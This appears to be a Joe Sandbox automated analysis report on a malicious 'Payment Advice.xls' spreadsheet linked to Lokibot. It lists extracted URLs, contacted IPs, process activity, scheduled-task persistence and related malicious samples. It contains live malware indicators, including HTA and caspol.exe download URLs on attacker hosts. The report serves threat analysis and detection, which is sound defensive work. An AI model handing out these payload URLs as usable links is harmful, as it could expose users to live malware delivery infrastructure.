                              https://provit.uk/~mshta.exe, 0000001D.00000003.511689770.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D5C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta..mshta.exe, 00000004.00000003.430428593.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430980490.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.431523218.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.entrust.n?mshta.exe, 0000001D.00000003.511761813.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D55000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion/kmshta.exe, 00000004.00000003.430428593.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430980490.00000000004C2000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://ocsp.entrust.net03mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511761813.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D55000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.ibsensoftware.com/rrwscqkDSNwLK.exe, rrwscqkDSNwLK.exe, 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, caspol.exe, 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Licensepowershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://provit.uk/mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.0000000000290000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.0000000000290000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.0000000000290000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htavfmshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://go.microspowershell.exe, 00000005.00000002.454706317.0000000003632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion0kmshta.exe, 00000004.00000002.431523218.000000000049A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionvcmshta.exe, 0000001D.00000003.506346159.0000000000240000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://contoso.com/powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaC:mshta.exe, 00000004.00000002.432158239.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.0000000000240000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.0000000000240000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506294361.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.504008484.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512306912.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.0000000000240000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://192.3.243.136/55/caspol.exeppowershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.454706317.0000000002271000.00000004.00000800.00020000.00000000.sdmp, caspol.exe, 0000000B.00000002.470705091.0000000002361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.0000000002181000.00000004.00000800.00020000.00000000.sdmp, caspol.exe, 00000025.00000002.532965241.0000000002581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaZfmshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htadfmshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://192.3.243.136/55/caspol.epowershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion2mshta.exe, 0000001D.00000003.506346159.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.000000000022C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://provit.uk/Jmshta.exe, 00000004.00000003.430980490.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430428593.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.431523218.0000000000512000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://contoso.com/Iconpowershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://provit.uk/:mshta.exe, 00000004.00000003.430980490.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430428593.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.431523218.0000000000512000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta38mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namep5WrrwscqkDSNwLK.exe, 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionketmshta.exe, 00000004.00000003.430640416.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430428593.0000000000512000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaV8mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://192.3.243.136/55/caspol.exe6powershell.exe, 0000001F.00000002.523691740.000000001AF69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaHfmshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta=8mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta$1mshta.exe, 0000001D.00000002.511914905.00000000001DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion?mshta.exe, 0000001D.00000002.511914905.00000000001DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htahtmshta.exe, 00000004.00000003.431264903.00000000034D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510361814.0000000002C25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506573800.0000000002C25000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                198.244.140.41
                                                                provit.ukUnited States
                                                                18630RIDLEYSD-NETUSfalse
                                                                192.3.243.136
                                                                unknownUnited States
                                                                36352AS-COLOCROSSINGUStrue
                                                                94.156.177.41
                                                                unknownBulgaria
                                                                43561NET1-ASBGtrue
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1559095
                                                                Start date and time:2024-11-20 07:55:09 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 8m 38s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                Number of analysed new started processes analysed:47
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • GSI enabled (VBA)
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Payment Advice.xls
                                                                Detection:MAL
                                                                Classification:mal100.phis.troj.spyw.expl.evad.winXLS@52/60@3/3
                                                                EGA Information:
                                                                • Successful, ratio: 71.4%
                                                                HCA Information:
                                                                • Successful, ratio: 98%
                                                                • Number of executed functions: 128
                                                                • Number of non-executed functions: 8
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .xls
                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                • Attach to Office via COM
                                                                • Active ActiveX Object
                                                                • Active ActiveX Object
                                                                • Scroll down
                                                                • Close Viewer
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                • Execution Graph export aborted for target mshta.exe, PID 3424 because there are no executed function
                                                                • Execution Graph export aborted for target mshta.exe, PID 3492 because there are no executed function
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                TimeTypeDescription
                                                                01:56:32API Interceptor117x Sleep call for process: mshta.exe modified
                                                                01:56:36API Interceptor341x Sleep call for process: powershell.exe modified
                                                                01:56:48API Interceptor1415x Sleep call for process: caspol.exe modified
                                                                01:56:50API Interceptor5x Sleep call for process: schtasks.exe modified
                                                                01:56:53API Interceptor116x Sleep call for process: AcroRd32.exe modified
                                                                01:56:56API Interceptor53x Sleep call for process: rrwscqkDSNwLK.exe modified
                                                                01:56:56API Interceptor176x Sleep call for process: taskeng.exe modified
                                                                22:56:55Task SchedulerRun new task: rrwscqkDSNwLK path: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                198.244.140.41Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                  192.3.243.136givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                  • 192.3.243.136/37/caspol.exe
                                                                  seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                  • 192.3.243.136/36/caspol.exe
                                                                  Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                  • 192.3.243.136/xampp/de/givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta
                                                                  Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                  • 192.3.243.136/xampp/rf/seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.hta
                                                                  kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                  • 192.3.243.136/32/SMPLLS.txt
                                                                  bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                  • 192.3.243.136/33/LOGLK.txt
                                                                  Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                  • 192.3.243.136/32/SMPLLS.txt
                                                                  Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                  • 192.3.243.136/33/LOGLK.txt
                                                                  94.156.177.41WjcXwIcclB.exeGet hashmaliciousLokibotBrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    provit.ukEnv#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                    • 198.244.140.41
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    AS-COLOCROSSINGUSEnv#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                    • 192.3.22.13
                                                                    9srIKeD54O.rtfGet hashmaliciousUnknownBrowse
                                                                    • 192.3.101.150
                                                                    exe009.exeGet hashmaliciousEmotetBrowse
                                                                    • 75.127.14.170
                                                                    bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                    • 107.172.44.178
                                                                    givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                    • 192.3.243.136
                                                                    seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                    • 192.3.243.136
                                                                    #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                    • 107.172.44.178
                                                                    Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                    • 192.3.243.136
                                                                    Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                    • 192.3.243.136
                                                                    seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                    • 192.227.228.36
                                                                    NET1-ASBGWjcXwIcclB.exeGet hashmaliciousLokibotBrowse
                                                                    • 94.156.177.41
                                                                    0aA7F59xDl.exeGet hashmaliciousLokibotBrowse
                                                                    • 94.156.177.95
                                                                    givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                    • 94.156.177.95
                                                                    seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                    • 94.156.177.95
                                                                    seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                    • 94.156.177.95
                                                                    PO-000041492.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                    • 94.156.177.95
                                                                    Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                    • 94.156.177.95
                                                                    Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                    • 94.156.177.95
                                                                    Zam#U00f3wienie 89118 _ Metal-Constructions.pdf.com.exeGet hashmaliciousQuasarBrowse
                                                                    • 93.123.85.234
                                                                    11_deb64ed.exeGet hashmaliciousLokibotBrowse
                                                                    • 94.156.177.95
                                                                    RIDLEYSD-NETUSEnv#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                    • 198.244.140.41
                                                                    nabspc.elfGet hashmaliciousUnknownBrowse
                                                                    • 198.244.7.173
                                                                    https://instagrambeta.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 198.244.231.90
                                                                    SecuriteInfo.com.Trojan.WinGo.Agent.27329.6060.exeGet hashmaliciousUnknownBrowse
                                                                    • 198.244.179.42
                                                                    Informations.batGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                    • 198.244.206.37
                                                                    Beopajki.exeGet hashmaliciousHVNC, PureLog Stealer, XWormBrowse
                                                                    • 198.244.206.37
                                                                    Your_New_Social_Security_Statement.wsfGet hashmaliciousXWormBrowse
                                                                    • 198.244.251.236
                                                                    http://www.loroc.co.uk/Get hashmaliciousUnknownBrowse
                                                                    • 198.244.213.27
                                                                    ODggSYsZP2.elfGet hashmaliciousUnknownBrowse
                                                                    • 198.244.7.172
                                                                    at0jsDxjXS.elfGet hashmaliciousUnknownBrowse
                                                                    • 198.244.66.83
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    7dcce5b76c8b17472d024758970a406bEnv#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                    • 198.244.140.41
                                                                    PO-73375.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                    • 198.244.140.41
                                                                    PO-000041492.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                    • 198.244.140.41
                                                                    #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                    • 198.244.140.41
                                                                    Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                    • 198.244.140.41
                                                                    Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                    • 198.244.140.41
                                                                    Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                    • 198.244.140.41
                                                                    Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                    • 198.244.140.41
                                                                    New order.xlsGet hashmaliciousUnknownBrowse
                                                                    • 198.244.140.41
